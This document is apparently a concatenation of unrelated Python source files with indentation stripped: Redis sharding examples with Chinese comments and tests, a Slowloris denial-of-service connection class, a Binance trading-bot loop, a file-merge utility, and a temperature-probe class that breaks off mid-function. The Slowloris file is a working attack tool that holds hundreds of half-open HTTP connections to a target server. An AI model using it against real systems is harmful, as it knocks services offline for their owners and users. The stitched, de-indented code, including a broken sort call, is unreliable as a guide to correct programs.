def get_shard_results_thread(component, shards, query, ids=None, ttl=300,
sort="-updated", start=0, num=20, wait=1, timeout=.5):
ids = ids or shards * [None]
rqueue = Queue()
for shard in xrange(shards):
t = threading.Thread(target=get_values_thread, args=(
component, shard, wait, rqueue, query, ids[shard],
ttl, sort, start, num))
t.setDaemon(1)
t.start()
received = 0
count = 0
data = []
deadline = time.time() + timeout
while received < shards and time.time() < deadline:
try:
sh, c, r, i = rqueue.get(timeout=max(deadline-time.time(), .001))
except Empty:
break
else:
count += c
data.extend(r)
ids[sh] = i
return count, data, ids
# 代码清单 10-7
# <start id="merge-sharded-results"/>
def to_numeric_key(data):
try:
# 这里之所以使用 Decimal 数字类型,
# 是因为这种类型可以合理地对整数和浮点数进行转换,
# 并在值缺失或者不是数字值的时候,
# 返回默认值 0 。
return Decimal(data[1] or '0')
except:
return Decimal('0')
def to_string_key(data):
# 总是返回一个字符串,即使在值缺失的情况下,也是如此。
return data[1] or ''
# 这个函数需要接受所有分片参数和搜索参数,
# 这些参数大部分都会被传给底层的函数,
# 而这个函数本身只会用到 sort 参数以及搜索偏移量。
def search_shards(component, shards, query, ids=None, ttl=300,
sort="-updated", start=0, num=20, wait=1):
# 获取未经排序的分片搜索结果。
count, data, ids = get_shard_results(
component, shards, query, ids, ttl, sort, start, num, wait)
# 准备好进行排序所需的各个参数。
reversed = sort.startswith('-')
sort = sort.strip('-')
key = to_numeric_key
if sort not in ('updated', 'id', 'created'):
key = to_string_key
# 根据 sort 参数对搜索结果进行排序。
data.sort(key=key, reverse=reversed)
results = []
# 只获取用户指定的那一页搜索结果。
for docid, score in data[start:start+num]:
results.append(docid)
# 返回被选中的结果,其中包括由每个分片的缓存 ID 组成的序列。
return count, results, ids
# <end id="merge-sharded-results"/>
# 代码清单 10-8
# <start id="zset-search-with-values"/>
# 这个函数接受 search_and_zsort() 函数所需的全部参数。
def search_get_zset_values(conn, query, id=None, ttl=300, update=1,
vote=0, start=0, num=20, desc=True):
# 调用底层的 search_and_zsort() 函数,
# 获取搜索结果的缓存 ID 以及结果包含的文档数量。
count, r, id = search_and_zsort(
conn, query, id, ttl, update, vote, 0, 1, desc)
# 获取指定的搜索结果以及这些结果的分值。
if desc:
data = conn.zrevrange(id, 0, start + num - 1, withscores=True)
else:
data = conn.zrange(id, 0, start + num - 1, withscores=True)
# 返回搜索结果的数量、搜索结果本身、搜索结果的分值以及搜索结果的缓存 ID 。
return count, data, id
# <end id="zset-search-with-values"/>
# 代码清单 10-9
# <start id="search-shards-zset"/>
# 函数需要接受所有分片参数以及所有搜索参数。
def search_shards_zset(component, shards, query, ids=None, ttl=300,
update=1, vote=0, start=0, num=20, desc=True, wait=1):
# 准备一些结构,用于储存之后获取到的数据。
count = 0
data = []
# 尝试使用已有的缓存结果;
# 如果没有缓存结果可用,那么开始一次新的搜索。
ids = ids or shards * [None]
for shard in xrange(shards):
# 获取或者创建指向每个分片的连接。
conn = get_redis_connection('%s:%s'%(component, shard), wait)
# 在分片上面进行搜索,并取得搜索结果的分值。
c, d, i = search_get_zset_values(conn, query, ids[shard],
ttl, update, vote, start, num, desc)
# 对每个分片的搜索结果进行合并。
count += c
data.extend(d)
ids[shard] = i
# 定义一个简单的排序辅助函数,让它只返回与分值有关的信息。
def key(result):
return result[1]
# 对所有搜索结果进行排序。
data.sort(key=key, reversed=desc)
results = []
# 从结果里面提取出文档 ID ,并丢弃与之关联的分值。
for docid, score in data[start:start+num]:
results.append(docid)
# 将搜索结果返回给调用者。
return count, results, ids
# <end id="search-shards-zset"/>
# 代码清单 10-11
# <start id="sharded-api-base"/>
class KeyShardedConnection(object):
# 对象使用组件名字以及分片数量进行初始化。
def __init__(self, component, shards):
self.component = component
self.shards = shards
# 当用户尝试从对象里面获取一个元素的时候,
# 这个方法就会被调用,
# 而调用这个方法时传入的参数就是用户请求的元素。
def __getitem__(self, key):
# 根据传入的键以及之前已知的组件名字和分片数量,
# 获取分片连接。
return get_sharded_connection(
self.component, key, self.shards)
# <end id="sharded-api-base"/>
# 代码清单 10-10
# <start id="sharded-api-example"/>
# 创建一个连接,这个连接包含对拥有指定分片数量的组件进行分片所需的相关信息。
sharded_timelines = KeyShardedConnection('timelines', 8)
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
if conn.zscore(fkey1, other_uid):
print "already followed", uid, other_uid
return None
now = time.time()
pipeline = conn.pipeline(True)
pipeline.zadd(fkey1, other_uid, now)
pipeline.zadd(fkey2, uid, now)
pipeline.zcard(fkey1)
pipeline.zcard(fkey2)
following, followers = pipeline.execute()[-2:]
pipeline.hset('user:%s'%uid, 'following', following)
pipeline.hset('user:%s'%other_uid, 'followers', followers)
pipeline.execute()
pkey = 'profile:%s'%other_uid
# 从正在关注的用户的个人时间线里面,取出最新的状态消息。
status_and_score = sharded_timelines[pkey].zrevrange(
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True)
if status_and_score:
hkey = 'home:%s'%uid
# 根据被分片的键获取一个连接,然后通过连接获取一个流水线对象。
pipe = sharded_timelines[hkey].pipeline(True)
# 将一系列状态消息添加到位于分片上面的定制时间线有序集合里面,
# 并在添加操作完成之后,对有序集合进行修剪。
pipe.zadd(hkey, **dict(status_and_score))
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)
# 执行事务。
pipe.execute()
return True
# <end id="sharded-api-example"/>
# 代码清单 10-13
# <start id="key-data-sharded-api"/>
class KeyDataShardedConnection(object):
# 对象使用组件名和分片数量进行初始化。
def __init__(self, component, shards):
self.component = component
self.shards = shards
# 当一对 ID 作为字典查找操作的其中一个参数被传入时,
# 这个方法将被调用。
def __getitem__(self, ids):
# 取出两个 ID ,并确保它们都是整数。
id1, id2 = map(int, ids)
# 如果第二个 ID 比第一个 ID 要小,
# 那么对调两个 ID 的位置,
# 从而确保第一个 ID 总是小于或等于第二个 ID 。
if id2 < id1:
id1, id2 = id2, id1
# 基于两个 ID 构建出一个键。
key = "%s:%s"%(id1, id2)
# 使用构建出的键以及之前已知的组件名和分片数量,
# 获取分片连接。
return get_sharded_connection(
self.component, key, self.shards)
# <end id="key-data-sharded-api"/>
_follow_user = follow_user
# 代码清单 10-12
# <start id="sharded-api-example2"/>
# 创建一个连接,
# 这个连接包含对拥有指定分片数量的组件进行分片所需的相关信息。
sharded_timelines = KeyShardedConnection('timelines', 8)
sharded_followers = KeyDataShardedConnection('followers', 16)
def follow_user(conn, uid, other_uid):
fkey1 = 'following:%s'%uid
fkey2 = 'followers:%s'%other_uid
# 根据 uid 和 other_uid 获取连接对象。
sconn = sharded_followers[uid, other_uid]
# 检查 other_uid 代表的用户是否已经关注了 uid 代表的用户。
if sconn.zscore(fkey1, other_uid):
return None
now = time.time()
spipe = sconn.pipeline(True)
# 把关注者的信息以及被关注者的信息添加到有序集合里面。
spipe.zadd(fkey1, other_uid, now)
spipe.zadd(fkey2, uid, now)
following, followers = spipe.execute()
pipeline = conn.pipeline(True)
# 为执行关注操作的用户以及被关注的用户更新关注者信息和正在关注信息。
pipeline.hincrby('user:%s'%uid, 'following', int(following))
pipeline.hincrby('user:%s'%other_uid, 'followers', int(followers))
pipeline.execute()
pkey = 'profile:%s'%other_uid
status_and_score = sharded_timelines[pkey].zrevrange(
pkey, 0, HOME_TIMELINE_SIZE-1, withscores=True)
if status_and_score:
hkey = 'home:%s'%uid
pipe = sharded_timelines[hkey].pipeline(True)
pipe.zadd(hkey, **dict(status_and_score))
pipe.zremrangebyrank(hkey, 0, -HOME_TIMELINE_SIZE-1)
pipe.execute()
return True
# <end id="sharded-api-example2"/>
# 代码清单 10-14
# <start id="sharded-zrangebyscore"/>
# 函数接受组件名称、分片数量以及那些可以在分片环境下产生正确行为的参数作为参数。
def sharded_zrangebyscore(component, shards, key, min, max, num):
data = []
for shard in xrange(shards):
# 获取指向当前分片的分片连接。
conn = get_redis_connection("%s:%s"%(component, shard))
# 从 Redis 分片上面取出数据。
data.extend(conn.zrangebyscore(
key, min, max, start=0, num=num, withscores=True))
# 首先基于分值对数据进行排序,然后再基于成员进行排序。
def key(pair):
return pair[1], pair[0]
data.sort(key=key)
# 根据用户请求的数量返回元素。
return data[:num]
# <end id="sharded-zrangebyscore"/>
# 代码清单 10-15
# <start id="sharded-syndicate-posts"/>
def syndicate_status(uid, post, start=0, on_lists=False):
root = 'followers'
key = 'followers:%s'%uid
base = 'home:%s'
if on_lists:
root = 'list:out'
key = 'list:out:%s'%uid
base = 'list:statuses:%s'
# 通过 ZRANGEBYSCORE 调用,找出下一组关注者。
followers = sharded_zrangebyscore(root,
sharded_followers.shards, key, start, 'inf', POSTS_PER_PASS)
# 基于预先分片的结果对个人信息进行分组,
# 并把分组后的信息储存到预先准备好的结构里面。
to_send = defaultdict(list)
for follower, start in followers:
# 构造出储存时间线的键。
timeline = base % follower
# 找到负责储存这个时间线的分片。
shard = shard_key('timelines',
timeline, sharded_timelines.shards, 2)
# 把时间线的键添加到位于同一个分片的其他时间线的后面。
to_send[shard].append(timeline)
for timelines in to_send.itervalues():
# 根据储存这组时间线的服务器,
# 找出连向它的连接,
# 然后创建一个流水线对象。
pipe = sharded_timelines[timelines[0]].pipeline(False)
for timeline in timelines:
# 把新发送的消息添加到时间线上面,
# 并移除过于陈旧的消息。
pipe.zadd(timeline, **post)
pipe.zremrangebyrank(
timeline, 0, -HOME_TIMELINE_SIZE-1)
pipe.execute()
conn = redis.Redis()
if len(followers) >= POSTS_PER_PASS:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, start, on_lists])
elif not on_lists:
execute_later(conn, 'default', 'syndicate_status',
[uid, post, 0, True])
# <end id="sharded-syndicate-posts"/>
def _fake_shards_for(conn, component, count, actual):
assert actual <= 4
for i in xrange(count):
m = i % actual
conn.set('config:redis:%s:%i'%(component, i), json.dumps({'db':14 - m}))
class TestCh10(unittest.TestCase):
def _flush(self):
self.conn.flushdb()
redis.Redis(db=14).flushdb()
redis.Redis(db=13).flushdb()
redis.Redis(db=12).flushdb()
redis.Redis(db=11).flushdb()
def setUp(self):
self.conn = redis.Redis(db=15)
self._flush()
global config_connection
config_connection = self.conn
self.conn.set('config:redis:test', json.dumps({'db':15}))
def tearDown(self):
self._flush()
def test_get_sharded_connections(self):
_fake_shards_for(self.conn, 'shard', 2, 2)
for i in xrange(10):
get_sharded_connection('shard', i, 2).sadd('foo', i)
s0 = redis.Redis(db=14).scard('foo')
s1 = redis.Redis(db=13).scard('foo')
self.assertTrue(s0 < 10)
self.assertTrue(s1 < 10)
self.assertEquals(s0 + s1, 10)
def test_count_visit(self):
shards = {'db':13}, {'db':14}
self.conn.set('config:redis:unique', json.dumps({'db':15}))
for i in xrange(16):
self.conn.set('config:redis:unique:%s'%i, json.dumps(shards[i&1]))
for i in xrange(100):
count_visit(str(uuid.uuid4()))
base = 'unique:%s'%date.today().isoformat()
total = 0
for c in shards:
conn = redis.Redis(**c)
keys = conn.keys(base + ':*')
for k in keys:
cnt = conn.scard(k)
total += cnt
self.assertTrue(cnt < k)
self.assertEquals(total, 100)
self.assertEquals(self.conn.get(base), '100')
def test_sharded_search(self):
_fake_shards_for(self.conn, 'search', 2, 2)
docs = 'hello world how are you doing'.split(), 'this world is doing fine'.split()
for i in xrange(50):
c = get_sharded_connection('search', i, 2)
index_document(c, i, docs[i&1], {'updated':time.time() + i, 'id':i, 'created':time.time() + i})
r = search_and_sort(c, docs[i&1], sort='-id')
self.assertEquals(r[1][0], str(i))
total = 0
for shard in (0,1):
count = search_get_values(get_redis_connection('search:%s'%shard),['this', 'world'], num=50)[0]
total += count
self.assertTrue(count < 50)
self.assertTrue(count > 0)
self.assertEquals(total, 25)
count, r, id = get_shard_results('search', 2, ['world', 'doing'], num=50)
self.assertEquals(count, 50)
self.assertEquals(count, len(r))
self.assertEquals(get_shard_results('search', 2, ['this', 'doing'], num=50)[0], 25)
count, r, id = get_shard_results_thread('search', 2, ['this', 'doing'], num=50)
self.assertEquals(count, 25)
self.assertEquals(count, len(r))
r.sort(key=lambda x:x[1], reverse=True)
r = list(zip(*r)[0])
count, r2, id = search_shards('search', 2, ['this', 'doing'])
self.assertEquals(count, 25)
self.assertEquals(len(r2), 20)
self.assertEquals(r2, r[:20])
def test_sharded_follow_user(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
sharded_timelines['profile:1'].zadd('profile:1', 1, time.time())
for u2 in xrange(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, u2, time.time() + u2)
_follow_user(self.conn, 1, u2)
_follow_user(self.conn, u2, 1)
self.assertEquals(self.conn.zcard('followers:1'), 9)
self.assertEquals(self.conn.zcard('following:1'), 9)
self.assertEquals(sharded_timelines['home:1'].zcard('home:1'), 9)
for db in xrange(14, 10, -1):
self.assertTrue(len(redis.Redis(db=db).keys()) > 0)
for u2 in xrange(2, 11):
self.assertEquals(self.conn.zcard('followers:%i'%u2), 1)
self.assertEquals(self.conn.zcard('following:%i'%u2), 1)
self.assertEquals(sharded_timelines['home:%i'%u2].zcard('home:%i'%u2), 1)
def test_sharded_follow_user_and_syndicate_status(self):
_fake_shards_for(self.conn, 'timelines', 8, 4)
_fake_shards_for(self.conn, 'followers', 4, 4)
sharded_followers.shards = 4
sharded_timelines['profile:1'].zadd('profile:1', 1, time.time())
for u2 in xrange(2, 11):
sharded_timelines['profile:%i'%u2].zadd('profile:%i'%u2, u2, time.time() + u2)
follow_user(self.conn, 1, u2)
follow_user(self.conn, u2, 1)
allkeys = defaultdict(int)
for db in xrange(14, 10, -1):
c = redis.Redis(db=db)
for k in c.keys():
allkeys[k] += c.zcard(k)
for k, v in allkeys.iteritems():
part, _, owner = k.partition(':')
if part in ('following', 'followers', 'home'):
self.assertEquals(v, 9 if owner == '1' else 1)
elif part == 'profile':
self.assertEquals(v, 1)
self.assertEquals(len(sharded_zrangebyscore('followers', 4, 'followers:1', '0', 'inf', 100)), 9)
syndicate_status(1, {'11':time.time()})
self.assertEquals(len(sharded_zrangebyscore('timelines', 4, 'home:2', '0', 'inf', 100)), 2)
if __name__ == '__main__':
unittest.main()
|
connection.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2017 Maxim Krivich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import time
import socket
import random
import threading
from Queue import Queue
from PySlowLoris import logger
from fake_useragent import UserAgent, FakeUserAgentError
class Connection(threading.Thread):
"""
This class implement SlowLoris connection
This class extends Thread that's mean you must launch in like a thread.(Thank you, captain Obvious!)
"""
SLEEP_TIME = 0.01
COUNT_OF_PRODUCERS = 3
def __init__(self, target, socket_count=300, headers={
'User-Agent': None, # UserAgent()
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'ru,en-us;q=0.7,en;q=0.3',
'Accept-Charset': 'windows-1251,utf-8;q=0.7,*;q=0.7',
'Connection': 'keep-alive'
}):
"""
:param target: link to web server [TargetInfo]
:param socket_count: maximum count of created socket default value 300
:param headers: HTTP headers what puts in request
"""
super(Connection, self).__init__()
# self.lock = lock
self.target = target
self.headers = headers
try:
self.fake_ua = UserAgent()
except FakeUserAgentError as fe:
logger.error(fe)
# Counters
self.socket_count = socket_count
self.__cnt_sent_requests = 0
self.__cnt_died_sockets = 0
self.__cnt_alive_socket = 0
self.__sockets = []
self.is_stop = False
def isStopped(self):
return self.is_stop
def stop(self):
self.is_stop = True
def __del__(self):
for soc in self.__sockets:
try:
soc.close()
except socket.error:
continue
except Exception as ex:
logger.exception(ex)
# stop all daemons
def __create_sockets(self, lock):
"""
:param lock: mutex for socket list
"""
while not self.isStopped():
if self.__cnt_alive_socket < self.socket_count:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((unicode(self.target['ip']), self.target['port']))
sock.send("GET /? {} HTTP/1.1\r\n".format(random.randint(0, 9999999)))
for k in self.headers.keys():
if k == "User-Agent":
self.headers[k] = str(self.fake_ua.random)
sock.send("{key}:{value}\r\n".format(key=k, value=self.headers[k]))
lock.acquire()
self.__sockets.append(sock)
self.__cnt_alive_socket += 1
lock.release()
except socket.error as err:
sock.close()
logger.error(err)
except Exception as ex:
logger.exception(ex)
def get_counter(self):
return {"alive": self.__cnt_alive_socket, "died": self.__cnt_died_sockets,
"requests": self.__cnt_sent_requests}
def __send_requests(self, queue, lock):
"""
:param queue: queue with sockets
:param lock: mutex for main counters
"""
while not self.isStopped():
sock = queue.get()
try:
sock.send("X-a: {} \r\n".format(random.randint(0, 9999999)))
lock.acquire()
self.__cnt_sent_requests += 1
lock.release()
time.sleep(self.SLEEP_TIME * random.random())
except socket.error:
lock.acquire()
self.__cnt_alive_socket -= 1
self.__cnt_died_sockets += 1
lock.release()
self.__sockets.remove(sock)
sock.close()
# logger.error(err)
except Exception as ex:
logger.exception(ex)
finally:
queue.task_done()
def run(self):
create_lock = threading.Lock()
counters_lock = threading.Lock()
# run creators
for _ in range(self.COUNT_OF_PRODUCERS):
t = threading.Thread(target=self.__create_sockets, args=(create_lock,))
t.daemon = True
t.start()
# waiting for sockets
while self.__cnt_alive_socket < self.socket_count:
time.sleep(1)
queue = Queue(self.socket_count + 10) # +10 for fun
# run senders
for _ in range(self.COUNT_OF_PRODUCERS):
t = threading.Thread(target=self.__send_requests, args=(queue, counters_lock,))
t.daemon = True
t.start()
while not self.isStopped():
if self.__cnt_alive_socket < self.socket_count:
time.sleep(1)
random.shuffle(self.__sockets)
for sock in self.__sockets:
queue.put(sock)
queue.join()
|
Binance_Detect_Moonings.py
|
"""
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repositoy should be
construed as investment advice.Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
"""
# use for environment variables
from genericpath import exists
import os
#from modules.rsi_signalmod_nigec import FULL_LOG
# use if needed to pass args to external modules
import sys
# used to create threads & dynamic loading of modules
import threading
import importlib
# used for directory handling
import glob
#gogo MOD telegram needs import request
import requests
# Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
from requests.exceptions import ReadTimeout, ConnectionError
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key,
load_telegram_creds
)
#import bot extension functions including main function for trading
from bot.settings import *
from bot.dynamics import *
from bot.report import *
from bot.session import *
from bot.tickers_list import *
from bot.grab import *
from bot.trade import *
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x: str) -> None:
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self) -> None:
pass
sys.stdout = St_ampe_dOut()
def pause_bot() -> None:
'''Pause the script when external indicators detect a bearish trend in the market'''
global bot_paused, hsp_head, settings_struct
global LIST_AUTOCREATE
# start counting for how long the bot has been paused
start_time = time.perf_counter()
while os.path.isfile("signals/paused.exc"):
if bot_paused == False:
print(f"{txcolors.WARNING}Buying paused due to negative market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}")
# sell all bought coins if bot is bot_paused
if STOP_LOSS_ON_PAUSE == True:
session_struct['sell_all_coins'] = True
bot_paused = True
# sell all bought coins if bot is bot_paused
if STOP_LOSS_ON_PAUSE == True:
session_struct['sell_all_coins'] = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
get_price(True)
# pausing here
#gogo MOD todo more verbose having all the report things in it!!!!!
report_update()
time.sleep(settings_struct['RECHECK_INTERVAL'])
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
# resume the bot and set pause_bot to False
if bot_paused == True:
print(f"{txcolors.WARNING}Resuming buying due to positive market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}")
tickers_list()
session_struct['dynamic'] = 'reset'
session_struct['sell_all_coins'] = False
bot_paused = False
return
if __name__ == '__main__':
mymodule = {}
print('Press Ctrl-Q to stop the script')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
print('WARNING: test mode is disabled in the configuration, you are using live funds.')
print('WARNING: Waiting 10 seconds before live trading as a security measure!')
time.sleep(10)
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
if os.path.isfile("signals/paused.exc"):
try:
os.remove("signals/paused.exc")
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
# load signalling modules
try:
if SIGNALLING_MODULES != None and len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
t = threading.Thread(target=mymodule[module].do_work, args=())
t.daemon = True
t.start()
time.sleep(2)
else:
print(f'No modules to load {SIGNALLING_MODULES}')
except Exception as e:
print(e)
# get decimal places for each coin as used by Binance
get_symbol_info()
# load historical price for PAIR_WITH
get_historical_price()
# seed initial prices
get_price()
#load previous session parameters
session('load')
#report that bot is started to defined communication channels
report('message', 'Bot initiated')
# start logging to CSV
c = threading.Thread(target=csv_log, args=(60,))
c.daemon = True
c.start()
while True:
ts = time.time()
pause_bot()
#main trading function
trade_crypto()
#recreate tickers list and reload it
reload_tickers()
#use dynamic settings to adjust change in price and take profit based on market support and resistance
dynamic_settings('mrs_settings', TIME_DIFFERENCE, RECHECK_INTERVAL)
#gogos MOD to adjust dynamically stoploss trailingstop loss and take profit based on wins
dynamic_settings(type, TIME_DIFFERENCE, RECHECK_INTERVAL)
#session calculations like unrealised potential etc
session('calc')
#save session data to session_info file
session('save')
#write report to console
report_update()
#sleep for RECHECK_INTERVAL time
ts_sleep = settings_struct['RECHECK_INTERVAL'] - ( time.time() - ts )
if (ts_sleep > 0 ) :
time.sleep(ts_sleep)
|
mergy.py
|
#!/usr/bin/env python3
# Author: Emmanuel Odeke <odeke@ualberta.ca>
# Copy content from src to destination only if it doesn't
# exist in the destination
import os
import sys
import json
import shutil
import hashlib
from threading import Thread
isDir = lambda p: p and os.path.isdir(p)
isPath = lambda p: p and os.path.isfile(p)
def getHashDigest(fPath):
if isPath(fPath):
with open(fPath, 'rb') as f:
digest = hashlib.md5(f.read()).hexdigest()
return digest
def mapDigests(dirPath, hmap):
for root, dirs, paths in os.walk(dirPath):
joinedPaths = (os.path.join(root, path) for path in paths)
for path in joinedPaths:
digest = getHashDigest(path)
hmap.setdefault(digest, []).append(path)
print(path, digest)
def getNonExistant(primary, secondary):
foreignToSecondary = []
for digest in primary:
if digest not in secondary:
headList = primary[digest]
if headList:
foreignToSecondary.append(headList[0])
return foreignToSecondary
def main():
argc = len(sys.argv)
if argc < 3:
sys.stderr.write('Usage: <primary_dir> <secondary_dir>\n')
sys.exit(-1)
pdir, sdir = sys.argv[1:3]
destination = sys.argv[3] if argc > 3 else sdir
if not isDir(pdir):
sys.stderr.write('Primary is not a directory\n')
elif not isDir(sdir):
sys.stderr.write('Secondary is not a directory\n')
else:
pmap = {}
smap = {}
pTh = Thread(target=mapDigests, args=(pdir, pmap))
sTh = Thread(target=mapDigests, args=(sdir, smap))
pTh.start()
sTh.start()
pTh.join()
sTh.join()
handleMerging(pmap, smap, destination)
def handleDirCreation(path):
if not path:
return 400, None
elif os.path.isdir(path):
return 409, path
else:
try:
os.mkdir(path)
except Exception as e:
return 500, e
else:
return 200, path
def handleMerging(pmap, smap, destination):
status, destPath = handleDirCreation(destination)
if not (status == 200 or status == 409):
return destPath # An error
errd = []
accessDenied = []
passCount = 0
foreignToSecondary = getNonExistant(pmap, smap)
for i, path in enumerate(foreignToSecondary):
if not os.access(path, os.R_OK):
accessDenied.append(path)
else:
try:
shutil.copy(path, destPath)
except Exception as e:
errd.append((path, str(e),))
else:
sys.stdout.write("Successful Copy: index %d/%d\r"%(passCount, i))
passCount += 1
if errd:
with open('errdCopy.json', 'w') as f:
f.write(json.dumps(errd))
if accessDenied:
with open('accessDenied.json', 'w') as g:
g.write(json.dumps(accessDenied))
return passCount
if __name__ == '__main__':
main()
|
pitmTemperature.py
|
#!/usr/bin/python
# piTempTemperature Temperature
import os
import hashlib
import struct
import socket
import syslog
import json
import sys
import threading
import time
import re
from pitmCfg import pitmCfg
class pitmTemperature:
def __init__(self):
self.logging = 2 # 1 = syslog, 2 = stderr
self.cfg = pitmCfg()
self.rxTemp = re.compile("^.*t=(\d+)")
self.probesToMonitor = {}
self.probesToMonitor[self.cfg.hltProbe] = False
self._targetHlt = (-1, -1, -1)
self._targetMash = (-1, -1, -1)
self._targetSparge = (-1, -1, -1)
self._targetFerm = (-1, -1, -1)
self._targetBoil = (-1, -1, -1)
self._mode = "unknown-mode"
self._brewlog = "<unknown brewlog.>"
self._recipe = "<unknown recipe>"
self._loop_multicast_socket = True
self.mcastMembership = False
self.currentScenario = "unknown"
self.currentTemperatures = {}
self.currentStatus = 0 # 0 = temperatureing
self.doTemperatureing = False
# odd readings
self.odd_readings = {}
# we need to supress results of 0 and 85 if they are the instant result
self.lastResult = {}
if os.path.exists("simulator"):
try:
os.mkdir("ipc/fake1wire")
except:
pass
self.tempBaseDir = "ipc/fake1wire/"
else:
self.tempBaseDir = "/sys/bus/w1/devices/"
def uncontrol(self):
pass
def __del__(self):
self.uncontrol()
def _log(self, msg):
if self.logging == 1:
syslog.syslog(syslog.LOG_DEBUG, msg)
elif self.logging == 2:
sys.stderr.write("%s\n" % (msg))
def _err(self, msg):
syslog.syslog(syslog.LOG_ERR, msg)
sys.stderr.write("%s\n" % (msg))
def broadcastResult(self):
# We should send a broadcast every second whilst we are alive.
sendSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sendSocket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 3)
controlMessage = {}
controlMessage['_operation'] = 'temperatureResults1'
controlMessage['_checksum'] = " "
controlMessage['currentStatus'] = self.currentStatus
controlMessage['currentResult'] = self.currentTemperatures
# we reflect _mode so we don't have to have everything listen to it
controlMessage['_mode'] = self._mode
# we also refelct the target temperature information which we got from
# governort
controlMessage['tempTargetHlt'] = self._targetHlt
controlMessage['tempTargetSparge'] = self._targetSparge
controlMessage['tempTargetMash'] = self._targetMash
controlMessage['tempTargetBoil'] = self._targetBoil
controlMessage['tempTargetFerm'] = self._targetFerm
controlMessage['_brewlog'] = self._brewlog
controlMessage['_recipe'] = self._recipe
controlMessage['mashA'] = self.cfg.mashAProbe
controlMessage['mashB'] = self.cfg.mashBProbe
controlMessage['hlt'] = self.cfg.hltProbe
controlMessage['boil'] = self.cfg.boilProbe
controlMessage['ferm'] = self.cfg.fermProbe
checksum = "%s%s" % (controlMessage, self.cfg.checksum)
controlMessage['_checksum'] = hashlib.sha1(self.cfg.checksum).hexdigest()
msg = json.dumps(controlMessage)
msg = "%s%s" % (msg, " " * (1200 - len(msg)))
if len(msg) > 1200:
self._err("Cannot send message - packet too big")
return
sendSocket.sendto(msg, (self.cfg.mcastGroup, self.cfg.mcastTemperaturePort))
sendSocket.close()
def _reject_result(self, probe, temperature, reason="unspecified"):
self.odd_readings[probe].append(temperature)
self._log('rejecting result %s %s (reason: %s)' % (probe, temperature, reason))
self.currentTemperatures[probe] = {'timestamp': time.time(), 'temperature': temperature, 'valid': False}
def _accept_adjust_and_add_a_reading(self, probe, temperature):
adjust = 0
if self.cfg.probeAdjustments.has_key(probe):
for (adjustMin, adjustMax, adjustAmount) in self.cfg.probeAdjustments[probe]:
if temperature >= adjustMin and temperature < adjustMax:
adjust = adjustAmount
temperature = temperature + adjust
break
self._log("Accepting result %s lastResult %s (Adjusted by %s)" % (temperature, self.lastResult[probe], adjust))
self.currentTemperatures[probe] = {'timestamp': time.time(), 'temperature': temperature, 'valid': True}
self.lastResult[probe] = temperature
self.odd_readings[probe] = []
def _read_temperature_from_external_probe(self, probe):
temperature = 0
ok = False
text = "NON"
try:
o = open("%s/%s/w1_slave" % (self.tempBaseDir, probe))
text = o.readline()
temp = o.readline()
o.close()
except:
pass
if text.count("YES") and self.rxTemp.match(temp): # CRC=NO for failed results
